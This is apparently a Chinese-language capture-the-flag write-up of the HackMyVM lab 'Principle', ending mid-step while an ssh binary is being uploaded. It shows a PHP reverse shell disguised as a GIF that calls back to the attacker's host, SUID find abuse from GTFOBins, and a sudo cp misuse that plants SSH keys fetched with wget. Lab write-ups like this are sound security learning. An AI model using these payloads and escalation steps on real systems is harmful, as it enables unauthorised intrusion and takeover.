{"id":602,"date":"2024-04-21T21:13:36","date_gmt":"2024-04-21T13:13:36","guid":{"rendered":"http:\/\/162.14.82.114\/?p=602"},"modified":"2024-04-21T21:13:36","modified_gmt":"2024-04-21T13:13:36","slug":"hmv-_-principle","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/602\/04\/21\/2024\/","title":{"rendered":"hmv[-_-]Principle"},"content":{"rendered":"

Principle<\/h1>\n

\"image-20240421191817119\"<\/div><\/p>\n

\"image-20240421191919853\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 192.168.0.101 -- -A\n\nOpen 192.168.0.101:80\n\nPORT   STATE SERVICE REASON  VERSION\n80\/tcp open  http    syn-ack nginx 1.22.1\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.22.1\n| http-robots.txt: 1 disallowed entry \n|_\/hackme\n|_http-title: Welcome to nginx!<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Principle]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.101\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.101\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,jpg,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/robots.txt           (Status: 200) [Size: 68]\n\/hi.html              (Status: 200) [Size: 141]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240421192351575\"<\/div><\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
http:\/\/192.168.0.101\/robots.txt<\/code><\/pre>\n
User-agent: *\nAllow: \/hi.html\nAllow: \/investigate\nDisallow: \/hackme<\/code><\/pre>\n
http:\/\/192.168.0.101\/hi.html<\/code><\/pre>\n
- Who I am?\n- You are a automaton\n- Are you sure?\n- Yep\n- Thank you, who has created me?\n- They say Elohim<\/code><\/pre>\n
http:\/\/192.168.0.101\/investigate\/<\/code><\/pre>\n
\"image-20240421192532707\"<\/div><\/p>\n
<!-- If you like research, I will try to help you to solve the enigmas, try to search for documents in this directory --><\/code><\/pre>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u6309\u7167\u5b83\u7ed9\u7684\u4fe1\u606f\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Principle]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.101\/investigate\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.101\/investigate\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,php,zip,bak,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 812]\n\/rainbow_mystery.txt  (Status: 200) [Size: 596]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u89e3\u5bc6<\/h3>\n
\u770b\u4e00\u4e0b\u8fd9\u662f\u4e2a\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Principle]\n\u2514\u2500$ curl http:\/\/192.168.0.101\/investigate\/rainbow_mystery.txt\nQWNjb3JkaW5nIHRvIHRoZSBPbGQgVGVzdGFtZW50LCB0aGUgcmFpbmJvdyB3YXMgY3JlYXRlZCBi\neSBHb2QgYWZ0ZXIgdGhlIHVuaXZlcnNhbCBGbG9vZC4gSW4gdGhlIGJpYmxpY2FsIGFjY291bnQs\nIGl0IHdvdWxkIGFwcGVhciBhcyBhIHNpZ24gb2YgdGhlIGRpdmluZSB3aWxsIGFuZCB0byByZW1p\nbmQgbWVuIG9mIHRoZSBwcm9taXNlIG1hZGUgYnkgR29kIGhpbXNlbGYgdG8gTm9haCB0aGF0IGhl\nIHdvdWxkIG5ldmVyIGFnYWluIGRlc3Ryb3kgdGhlIGVhcnRoIHdpdGggYSBmbG9vZC4KTWF5YmUg\ndGhhdCdzIHdoeSBJIGFtIGEgcm9ib3Q\/Ck1heWJlIHRoYXQgaXMgd2h5IEkgYW0gYWxvbmUgaW4g\ndGhpcyB3b3JsZD8KClRoZSBhbnN3ZXIgaXMgaGVyZToKLS4uIC0tLSAtLSAuLSAuLiAtLiAvIC0g\nLi4uLi0gLi0uLiAtLS0tLSAuLi4gLi0uLS4tIC4uLi4gLS0gLi4uLQo=<\/code><\/pre>\n
\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
From_Base64('A-Za-z0-9+\/=',true,false)<\/strong><\/p>\n
According to the Old Testament, the rainbow was created by God after the universal Flood. In the biblical account, it would appear as a sign of the divine will and to remind men of the promise made by God himself to Noah that he would never again destroy the earth with a flood.\nMaybe that's why I am a robot?\nMaybe that is why I am alone in this world?\n\nThe answer is here:\n-.. --- -- .- .. -. \/ - ....- .-.. ----- ... .-.-.- .... -- ...-<\/code><\/pre>\n
From_Morse_Code('Space','Line feed')<\/strong><\/p>\n
DOMAINT4L0S.HMV<\/code><\/pre>\n
\u6dfb\u52a0host\u8bb0\u5f55\uff1a<\/p>\n
192.168.0.101   t4l0s.hmv<\/code><\/pre>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# curl http:\/\/t4l0s.hmv                                 <!DOCTYPE html>\n<html>\n<head>\n  <title>Console<\/title>\n  <style>\n    body {\n      background-color: #000;\n      color: #0F0;\n      font-family: monospace;\n      font-size: 14px;\n      padding: 20px;\n    }\n\n    .console-text {\n      white-space: pre;\n    }\n\n    .console-text:before {\n      content: ;\n      color: #0F0;\n    }\n  <\/style>\n<\/head>\n<body>\n  <div class="console-text">\n[elohim@principle ~]$ echo "My son, you were born of dust and walk in my garden. Hear now my voice, I am your creator, and I am called $(whoami)."\nMy son, you were born of dust and walk in my garden. Hear now my voice, I am your creator, and I am called elohim.\n<! Elohim is a liar and you must not listen to him, he is not here but it is possible to find him, you must look somewhere else. ->\n\n               ,,ggddY888Ybbgg,,\n          ,agd8""'   .d8888888888bga,\n       ,gdP""'     .d88888888888888888g,\n     ,dP"        ,d888888888888888888888b,\n   ,dP"         ,8888888888888888888888888b,\n  ,8"          ,8888888P"""88888888888888888,\n ,8'           I888888I    )88888888888888888,\n,8'            `8888888booo8888888888888888888,\nd'              `88888888888888888888888888888b\n8                `"8888888888888888888888888888\n8                  `"88888888888888888888888888\n8                      `"8888888888888888888888\nY,                        `8888888888888888888P\n`8,                         `88888888888888888'\n `8,              .oo.       `888888888888888'\n  `8a             8888        88888888888888'\n   `Yba           `""'       ,888888888888P'\n     "Yba                   ,88888888888'\n       `"Yba,             ,8888888888P"'                \n          `"Y8baa,      ,d88888888P"'\n               ``""YYba8888P888"'\n  <\/div>\n<\/body>\n<\/html><\/code><\/pre>\n
FUZZ<\/h3>\n
\u5c1d\u8bd5fuzz\u4e00\u4e0bdns\u8bb0\u5f55\uff01<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# ffuf -u http:\/\/t4l0s.hmv -H 'Host: FUZZ.t4l0s.hmv' -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -fs 615\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/t4l0s.hmv\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt\n :: Header           : Host: FUZZ.t4l0s.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 615\n________________________________________________\n\nhellfire                [Status: 200, Size: 1659, Words: 688, Lines: 52, Duration: 8ms]\n:: Progress: [114441\/114441] :: Job [1\/1] :: 9523 req\/sec :: Duration: [0:00:13] :: Errors: 0 ::<\/code><\/pre>\n
\u6dfb\u52a0dns\u8bb0\u5f55\uff1a<\/p>\n
192.168.0.101   hellfire.t4l0s.hmv<\/code><\/pre>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# curl http:\/\/hellfire.t4l0s.hmv\n<!DOCTYPE html>\n<html>\n<head>\n  <title>Console<\/title>\n  <style>\n    body {\n      background-color: #000;\n      color: #0F0;\n      font-family: monospace;\n      font-size: 14px;\n      padding: 20px;\n    }\n\n    .console-text {\n      white-space: pre;\n    }\n\n    .console-text:before {\n      content: ;\n      color: #0F0;\n    }\n  <\/style>\n<\/head>\n<body>\n  <div class="console-text">\n[elohim@principle ~]$ echo "Road to $HOME, but you don't have access to the System. You should not look for the way, you have been warned." \nRoad to \/gehenna, but you don't have access to the System. You should not look for the way, you have been warned.\n<! You're on the right track, he's getting angry! ->\n\n                         ______                     \n _________        .---"""      """---.              \n:______.-':      :  .--------------.  :             \n| ______  |      | :                : |             \n|:______B:|      | |  SON,          | |             \n|:______B:|      | |                | |             \n|:______B:|      | |  YOU don't     | |             \n|         |      | |  access.       | |             \n|:_____:  |      | |                | |             \n|    ==   |      | :                : |             \n|       O |      :  '--------------'  :             \n|       o |      :'---...______...---'              \n|       o |-._.-i___\/'             \\._              \n|'-.____o_|   '-.   '-...______...-'  `-._          \n:_________:      `.____________________   `-.___.-. \n                 .'.eeeeeeeeeeeeeeeeee.'.      :___:\n               .'.eeeeeeeeeeeeeeeeeeeeee.'.         \n              :____________________________:"\n  <\/div>\n<\/body>\n<\/html><\/code><\/pre>\n
\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# gobuster dir -u http:\/\/hellfire.t4l0s.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,html,jpg,txt,bak\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/hellfire.t4l0s.hmv\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,html,jpg,txt,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 1659]\n\/upload.php           (Status: 200) [Size: 748]\n\/output.php           (Status: 200) [Size: 1350]\n\/archivos             (Status: 301) [Size: 169] [--> http:\/\/hellfire.t4l0s.hmv\/archivos\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u53d1\u73b0\uff1a<\/p>\n
\"image-20240421195828699\"<\/div><\/p>\n
\u5c1d\u8bd5\u6293\u5305\u4e0a\u4f20\u4f2a\u88c5\u7684\u53cd\u5f39shell\uff01<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/Downloads]\n\u2514\u2500# vim reverseShell.gif\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/Downloads]\n\u2514\u2500# head reverseShell.gif\nGIF89a\n  <?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = "1.0";\n  $ip = '192.168.0.143';  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n
\u4fee\u6539\u4e00\u4e0b\u5305\uff1a<\/p>\n
\"image-20240421200543101\"<\/div><\/p>\n
\u7136\u540e\u53d1\u9001\u8fc7\u53bb\uff01<\/p>\n
\"image-20240421200614088\"<\/div><\/p>\n
\u8bbf\u95ee\u6fc0\u6d3b\u5373\u53ef\uff01<\/p>\n
curl http:\/\/hellfire.t4l0s.hmv\/archivos\/reverseShell.php<\/code><\/pre>\n
\"image-20240421200853991\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@principle:\/$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@principle:\/$ ls -la\ntotal 68\ndrwxr-xr-x  18 root root  4096 Jul 11  2023 .\ndrwxr-xr-x  18 root root  4096 Jul 11  2023 ..\nlrwxrwxrwx   1 root root     7 Jun 30  2023 bin -> usr\/bin\ndrwxr-xr-x   3 root root  4096 Jul 11  2023 boot\ndrwxr-xr-x  17 root root  3300 Apr 21 07:13 dev\ndrwxr-xr-x  71 root root  4096 Apr 21 07:13 etc\ndrwxr-xr-x   4 root root  4096 Jul  4  2023 home\nlrwxrwxrwx   1 root root    29 Jul 11  2023 initrd.img -> boot\/initrd.img-6.1.0-9-amd64\nlrwxrwxrwx   1 root root    29 Jun 30  2023 initrd.img.old -> boot\/initrd.img-6.1.0-9-amd64\nlrwxrwxrwx   1 root root     7 Jun 30  2023 lib -> usr\/lib\nlrwxrwxrwx   1 root root     9 Jun 30  2023 lib32 -> usr\/lib32\nlrwxrwxrwx   1 root root     9 Jun 30  2023 lib64 -> usr\/lib64\nlrwxrwxrwx   1 root root    10 Jun 30  2023 libx32 -> usr\/libx32\ndrwx------   2 root root 16384 Jun 30  2023 lost+found\ndrwxr-xr-x   3 root root  4096 Jun 30  2023 media\ndrwxr-xr-x   2 root root  4096 Jun 30  2023 mnt\ndrwxr-xr-x   2 root root  4096 Jul  7  2023 opt\ndr-xr-xr-x 143 root root     0 Apr 21 07:13 proc\ndrwx------   5 root root  4096 Jul 14  2023 root\ndrwxr-xr-x  18 root root   540 Apr 21 07:13 run\nlrwxrwxrwx   1 root root     8 Jun 30  2023 sbin -> usr\/sbin\ndrwxr-xr-x   2 root root  4096 Jun 30  2023 srv\ndr-xr-xr-x  13 root root     0 Apr 21 07:13 sys\ndrwxrwxrwt   8 root root  4096 Apr 21 08:09 tmp\ndrwxr-xr-x  14 root root  4096 Jun 30  2023 usr\ndrwxr-xr-x  12 root root  4096 Jun 30  2023 var\nlrwxrwxrwx   1 root root    26 Jul 11  2023 vmlinuz -> boot\/vmlinuz-6.1.0-9-amd64\nlrwxrwxrwx   1 root root    26 Jun 30  2023 vmlinuz.old -> boot\/vmlinuz-6.1.0-9-amd64\n(remote) www-data@principle:\/$ cd \/home\n(remote) www-data@principle:\/home$ ls -la\ntotal 16\ndrwxr-xr-x  4 root   root   4096 Jul  4  2023 .\ndrwxr-xr-x 18 root   root   4096 Jul 11  2023 ..\ndrwxr-xr-x  4 elohim elohim 4096 Jul 14  2023 gehenna\ndrwxr-xr-x  4 talos  talos  4096 Jul 14  2023 talos\n(remote) www-data@principle:\/home$ cd gehenna\/\n(remote) www-data@principle:\/home\/gehenna$ ls -la\ntotal 40\ndrwxr-xr-x 4 elohim elohim 4096 Jul 14  2023 .\ndrwxr-xr-x 4 root   root   4096 Jul  4  2023 ..\n-rw------- 1 elohim elohim  289 Jul 14  2023 .bash_history\n-rw-r----- 1 elohim elohim  261 Jul  5  2023 .bash_logout\n-rw-r----- 1 elohim elohim 3830 Jul 14  2023 .bashrc\ndrw-r----- 3 elohim elohim 4096 Jul  2  2023 .local\n-rw-r----- 1 elohim elohim   21 Jul 12  2023 .lock\n-rw-r----- 1 elohim elohim  807 Jul  6  2023 .profile\ndrwx------ 2 elohim elohim 4096 Jul  6  2023 .ssh\n-rw-r----- 1 elohim elohim  777 Jul 13  2023 flag.txt\n(remote) www-data@principle:\/home\/gehenna$ cd ..\/talos\/\n(remote) www-data@principle:\/home\/talos$ ls -la\ntotal 40\ndrwxr-xr-x 4 talos talos 4096 Jul 14  2023 .\ndrwxr-xr-x 4 root  root  4096 Jul  4  2023 ..\n-rw-r--r-- 1 talos talos    1 Jul 14  2023 .bash_history\n-rw-r----- 1 talos talos  261 Jul  5  2023 .bash_logout\n-rw-r----- 1 talos talos 3545 Jul 14  2023 .bashrc\n-rw------- 1 talos talos   20 Jul  4  2023 .lesshst\ndrw-r----- 3 talos talos 4096 Jun 30  2023 .local\n-rw-r----- 1 talos talos  807 Jun 30  2023 .profile\ndrwx------ 2 talos talos 4096 Jul 14  2023 .ssh\n-rw-r----- 1 talos talos  320 Jul 13  2023 note.txt\n(remote) www-data@principle:\/home\/talos$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/find\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp<\/code><\/pre>\n
\u63d0\u6743\u81f3talos<\/h3>\n
\u53d1\u73b0find<\/code>\u5b58\u5728suid<\/code>\u6743\u9650\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/find\/#suid<\/a><\/p>\n
(remote) www-data@principle:\/home\/talos$ \/usr\/bin\/find . -exec \/bin\/sh -p \\; -quit\n\\[\\](remote)\\[\\] \\[\\]talos@principle\\[\\]:\\[\\]\/home\/talos\\[\\]$ \n(local) pwncat$                                                                                                                                         \n(remote) talos@principle:\/home\/talos$<\/code><\/pre>\n
(remote) talos@principle:\/home\/talos$ ls -la\ntotal 40\ndrwxr-xr-x 4 talos talos 4096 Jul 14  2023 .\ndrwxr-xr-x 4 root  root  4096 Jul  4  2023 ..\n-rw-r--r-- 1 talos talos    1 Jul 14  2023 .bash_history\n-rw-r----- 1 talos talos  261 Jul  5  2023 .bash_logout\n-rw-r----- 1 talos talos 3545 Jul 14  2023 .bashrc\n-rw------- 1 talos talos   20 Jul  4  2023 .lesshst\ndrw-r----- 3 talos talos 4096 Jun 30  2023 .local\n-rw-r----- 1 talos talos  807 Jun 30  2023 .profile\ndrwx------ 2 talos talos 4096 Jul 14  2023 .ssh\n-rw-r----- 1 talos talos  320 Jul 13  2023 note.txt\n(remote) talos@principle:\/home\/talos$ cat note.txt\nCongratulations! You have made it this far thanks to the manipulated file I left you, I knew you would make it!\nNow we are very close to finding this false God Elohim.\nI left you a file with the name of one of the 12 Gods of Olympus, out of the eye of Elohim ;)\nThe tool I left you is still your ally. Good luck to you.\n(remote) talos@principle:\/home\/talos$ id\nuid=33(www-data) gid=33(www-data) euid=1000(talos) groups=33(www-data)<\/code><\/pre>\n
\u67e5\u4e00\u4e0b\u4ed6\u8bf4\u768412 Gods of Olympus<\/code>\uff1a<\/p>\n
Afrodita\nApolo\nZeus\nHera\nPoseidon\nAres\nAtenea\nHermes\nArtemisa\nHefesto\nDemeter\nHestia<\/code><\/pre>\n
\u5229\u7528\u8fd9\u4e2a\u540d\u5355\u8fdb\u884c\u67e5\u627e\uff1a<\/p>\n
(remote) talos@principle:\/tmp$ for line in $(cat name.txt); do find \/ -iname *$line* 2>\/dev\/null; done<\/code><\/pre>\n
\u770b\u4e0b\u6709\u5565\uff1a<\/p>\n
\/etc\/selinux\/Afrodita.key\n\/usr\/lib\/modules\/6.1.0-9-amd64\/kernel\/drivers\/power\/supply\/cros_peripheral_charger.ko\n\/usr\/share\/zoneinfo\/Antarctica\/Rothera\n\/usr\/share\/zoneinfo\/right\/Antarctica\/Rothera\n\/usr\/share\/zoneinfo\/Europe\/Bucharest\n\/usr\/share\/zoneinfo\/right\/Europe\/Bucharest<\/code><\/pre>\n
\u67e5\u770b\u4e00\u4e0b\u7b2c\u4e00\u4e2a\uff01<\/p>\n
(remote) talos@principle:\/tmp$ cat \/etc\/selinux\/Afrodita.key\nHere is my password:\nHax0rModeON\n\nNow I have done another little trick to help you reach Elohim.\nREMEMBER: You need the access key and open the door. Anyway, he has a bad memory and that's why he keeps the lock coded and hidden at home.<\/code><\/pre>\n
\u5207\u6362\u4e00\u4e0b\u7528\u6237\uff01<\/p>\n
(remote) talos@principle:\/tmp$ su talos\nPassword: \ntalos@principle:\/tmp$ whoami;id\ntalos\nuid=1000(talos) gid=1000(talos) groups=1000(talos),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)<\/code><\/pre>\n
\u81f3\u6b64\uff0c\u6211\u4eec\u624d\u771f\u6b63\u62ff\u5230\u4e86talos<\/code>\u7528\u6237\uff01<\/p>\n
\u81f3\u4e8e\u4e0a\u9762\u63d0\u793a\u8bf4\u7684lock<\/code>\uff0c\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5cp\u51fa\u6765\uff1a<\/p>\n
(remote) talos@principle:\/home\/talos$ cd ..\n(remote) talos@principle:\/home$ ls\ngehenna  talos\n(remote) talos@principle:\/home$ cd talos\/\n(remote) talos@principle:\/home\/talos$ touch .lock\n(remote) talos@principle:\/home\/talos$ sudo -u elohim cp \/home\/gehenna\/.lock .\n(remote) talos@principle:\/home\/talos$ cat .lock\n7072696e6369706c6573<\/code><\/pre>\n
\u8fdb\u4e00\u6b65\u63d0\u6743<\/h3>\n
talos@principle:\/tmp$ sudo -l\nMatching Defaults entries for talos on principle:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser talos may run the following commands on principle:\n    (elohim) NOPASSWD: \/bin\/cp<\/code><\/pre>\n
buff\u53e0\u6ee1\u4e86\uff0c\u7ee7\u7eed\u723d\uff01\u521a\u505a\u5b8cFive<\/code>\uff0c\u4e00\u6837\u7684\u5957\u8def\uff01<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# ssh-keygen -t rsa -b 4096 -f \/home\/kali\/temp\/Principle\/elohim\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/Principle\/elohim\nYour public key has been saved in \/home\/kali\/temp\/Principle\/elohim.pub\nThe key fingerprint is:\nSHA256:U18TTdifQW72bKd63CQSpODqaLDPfQRggJHraTjDVK8 root@kali\nThe key's randomart image is:\n+---[RSA 4096]----+\n|.+..          o*.|\n|o  .o   .   . ooo|\n| ..... . ..o  o++|\n|..   .. ......o+o|\n|= . .  oS   ..  =|\n|+=.E  . ..  . .oo|\n|.o o o .     o.+ |\n|  ..o.. .    .o .|\n|   oo ..    ..   |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# mv elohim.pub authorized_keys       \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.101 - - [21\/Apr\/2024 08:37:15] "GET \/authorized_keys HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.<\/code><\/pre>\n
talos@principle:\/tmp$ ss -tnlup\nNetid          State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process          \nudp            UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*                             \ntcp            LISTEN          0               128                            0.0.0.0:3445                        0.0.0.0:*                             \ntcp            LISTEN          0               511                            0.0.0.0:80                          0.0.0.0:*                             \ntcp            LISTEN          0               128                               [::]:3445                           [::]:*                             \ntcp            LISTEN          0               511                               [::]:80                             [::]:*                             \ntalos@principle:\/tmp$ nc 0.0.0.0 3445\nSSH-2.0-OpenSSH_9.2p1 Debian-2\n^C\ntalos@principle:\/tmp$ cd \/home\ntalos@principle:\/home$ cd talos\/\ntalos@principle:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 talos talos 4096 Jul 14  2023 .\ndrwxr-xr-x 4 root  root  4096 Jul  4  2023 ..\n-rw-r--r-- 1 talos talos    1 Jul 14  2023 .bash_history\n-rw-r----- 1 talos talos  261 Jul  5  2023 .bash_logout\n-rw-r----- 1 talos talos 3545 Jul 14  2023 .bashrc\n-rw------- 1 talos talos   20 Jul  4  2023 .lesshst\ndrw-r----- 3 talos talos 4096 Jun 30  2023 .local\n-rw-r----- 1 talos talos  320 Jul 13  2023 note.txt\n-rw-r----- 1 talos talos  807 Jun 30  2023 .profile\ndrwx------ 2 talos talos 4096 Jul 14  2023 .ssh\ntalos@principle:~$ cd \/tmp\ntalos@principle:\/tmp$ wget http:\/\/192.168.0.143:8888\/authorized_keys\n--2024-04-21 08:37:16--  http:\/\/192.168.0.143:8888\/authorized_keys\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 735 [application\/octet-stream]\nSaving to: \u2018authorized_keys\u2019\n\nauthorized_keys                       100%[=========================================================================>]     735  --.-KB\/s    in 0s      \n\n2024-04-21 08:37:16 (32.1 MB\/s) - \u2018authorized_keys\u2019 saved [735\/735]\n\ntalos@principle:\/tmp$ sudo -l\nMatching Defaults entries for talos on principle:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser talos may run the following commands on principle:\n    (elohim) NOPASSWD: \/bin\/cp\ntalos@principle:\/tmp$ sudo -u elohim \/bin\/cp authorized_keys \/home\/gehenna\/.ssh\/authorized_keys<\/code><\/pre>\n
\u7136\u540e\u5c1d\u8bd5ssh\u8fde\u63a5\uff1a<\/p>\n
talos@principle:\/tmp$ wget http:\/\/192.168.0.143:8888\/elohim\n--2024-04-21 08:41:34--  http:\/\/192.168.0.143:8888\/elohim\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 3369 (3.3K) [application\/octet-stream]\nSaving to: \u2018elohim\u2019\n\nelohim                                100%[=========================================================================>]   3.29K  --.-KB\/s    in 0s      \n\n2024-04-21 08:41:34 (318 MB\/s) - \u2018elohim\u2019 saved [3369\/3369]\n\ntalos@principle:\/tmp$ chmod 600 elohim \ntalos@principle:\/tmp$ ssh gehenna@127.0.0.1 -p 3445 -i elohim\nbash: \/usr\/bin\/ssh: Permission denied<\/code><\/pre>\n
\u554a\uff0c\u6743\u9650\u4e0d\u591f\u3002\u3002\u3002\u3002\u4e0a\u4f20\u4e00\u4e2assh\u7ed9\u4ed6\u7528\uff01\u8fd9\u662f\u6bd4\u8f83\u7701\u4e8b\u7684\uff01<\/p>\n
\u65b9\u6cd5\u4e00\uff1a\u4e0a\u4f20ssh<\/h3>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# whereis ssh                            \nssh: \/usr\/bin\/ssh \/etc\/ssh \/usr\/share\/man\/man1\/ssh.1.gz\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# cp \/usr\/bin\/ssh .\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Principle]\n\u2514\u2500# python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.101 - - [21\/Apr\/2024 08:47:02] "GET \/ssh HTTP\/1.1" 200 -<\/code><\/pre>\n
